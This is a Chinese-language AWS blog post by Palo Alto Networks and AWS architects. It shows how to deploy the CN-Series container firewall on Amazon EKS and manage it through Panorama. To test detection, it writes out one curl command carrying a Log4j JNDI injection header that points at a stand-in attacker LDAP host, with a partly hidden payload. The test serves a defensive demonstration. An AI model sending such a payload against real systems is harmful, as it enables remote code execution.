亚马逊AWS官方博客

Palo Alto Networks 容器防火墙保护 Amazon EKS 安全

伴随业务容器化,保护容器环境中的敏感信息窃取成为了重中之重。

应用之间的信任边界属于逻辑位置,可执行分段策略,防止威胁横向扩散。在许多 Amazon EKS 环境中,命名空间是信任边界。在命名空间之间以及命名空间与其他类型的工作负载(例如虚拟主机或裸机服务器)之间执行威胁防御策略,可以阻止威胁在云原生应用和传统基础架构之间移动。

与许多应用一样,攻击也会使用端口,但企业仅保护端口是远远不够的,尤其在复杂的 Amazon EKS 容器环境中,还要有基于应用、威胁流量、恶意软件等防御能力,因此很多客户使用容器版本下一代防火墙保护 Amazon EKS 环境免遭基于文件的威胁,包括漏洞利用、恶意软件、间谍软件,以及之前未知的威胁。此外,开启 URL 过滤和 DNS 安全服务能够保护您的环境免遭基于 Web 的威胁,包括网络钓鱼、命令和控制及数据窃取。

Palo Alto Networks CN-Series (简称 CN 系列)容器版本防火墙是容器化的下一代防火墙,可为 EKS 集群上的容器化应用程序工作负载提供可见性和安全性,它能够与亚马逊云科技原生服务无缝集成,提供了精确的容器级别安全保护。下图显示了受容器防火墙(cn-ngfw)保护的三层应用程序示例,同时简述了容器防火墙如何检查区域内的所有南北向、东西向、容器到容器或容器到服务应用程序流量。

本文将在亚马逊云科技中启用一套完整的 Amazon EKS 环境、Guestbook Pod、redis Pod,同时部署容器防火墙并使用 DaemonSet 方式放置在要保护集群中工作负载的每个节点上,通过配置容器防火墙管理平台(Panorama)对容器防火墙实现 License 授权、策略下发、日志收集等工作内容。

首先确保 EKS 集群是 Ready 状态,在 AWS Console 中进入 Amazon EKS > Clusters 可以看到集群信息:

确认容器防火墙已经部署完成。进入 AWS console,点击 Amazon EKS > Clusters,点击 cluster 名称下面的 Workloads 标签查看 Pod 运行情况:

使用如下命令部署完成 guestbook 与 redis Pod:

kubectl apply -f guestbook.yml
kubectl apply -f redis.yml
kubectl get pods -n sample-app
kubectl get services -n sample-app

激活容器防火墙安全策略,可以浏览到 Guestbook 网页,浏览该页面几分钟后,日志将开始显示。容器防火墙管理平台 Panorama 从容器防火墙收集日志。

现在我们通过脚本产生一份利用 Apache Log4j 漏洞的攻击流量,尝试在穿越容器防火墙的时候,该流量是否能正常被容器防火墙识别从而触发期望的拦截动作。

curl $Guestbook_POD:8080 -H 'X-Api-Version: ${jndi:ldap://attacker-svr:1389/Basic/Command/Base64/d2dldCBodxxxxxxxxxxxxxxxxxxxxxx}' 

//此处隐藏部分攻击代码

进入容器防火墙管理平台 Panorama 管理界面,可以看到 Guestbook Pod 的浏览日志,同时可正常识别该流量为 Apache Log4j Remote Code Execution Vulnerability,该日志表明 Guestbook Pod 现在已经受到容器防火墙的保护,此时当 Guestbook Pod 被劫持或容器逃逸发生对生产业务 Pod 进行攻击时,容器防火墙可轻松阻断。

至此,我们完成了一个容器防火墙的部署,并验证了拦截威胁流量的能力。通过容器防火墙的部署,无缝链接到 DevOps 工作流程中,防止最新威胁侵入到网络与业务中。

使用 Palo Alto Networks 容器防火墙的客户收益

1. 获得可视性和控制

Palo Alto Networks 容器防火墙提供了全面的第7层流量可视性,包括出站流量的容器源 IP,并可以检测和阻止威胁潜入在命名空间边界之间流动的流量。

2. 简化 DevOps 安全

Palo Alto Networks 容器防火墙可直接便利地部署到 DevOps 工作流中。YAML 文件配置可在整体 Kubernetes 编排过程中无缝建立部署。

3. 改善整体安全状况

Palo Alto Networks 容器防火墙通过与其他 Palo Alto Networks 防火墙共享 Kubernetes 情境信息,在容器流量中执行企业级的网络安全和威胁防护措施,改善整体安全状况。

4. 节省时间和人力

使用 Panorama 作为单一控制台,管理所有网络安全组件和防火墙,无论是物理、虚拟还是容器防火墙。

本篇作者

胡南

Palo Alto Networks 云安全架构师。AWS Certified Solutions Architect – Professional。15 年以上云安全、网络安全、主机安全、容器安全、数据安全及 SASE 的服务经验,曾在多家知名外企从事售前与架构设计工作。

张元涛

亚马逊云科技高级架构师。负责亚马逊云科技合作伙伴相关解决方案的建设以及合作伙伴生态合作。与合作伙伴一起,根据客户需求,分析其在技术架构层面所遇到的挑战和未来的方向,设计和落地基于亚马逊云科技平台和合作伙伴产品的架构方案。曾在知名外企以及国内领导企业任解决方案架构师。在云以及网络等领域有丰富的经验,对于公有云服务以及架构有深入的理解。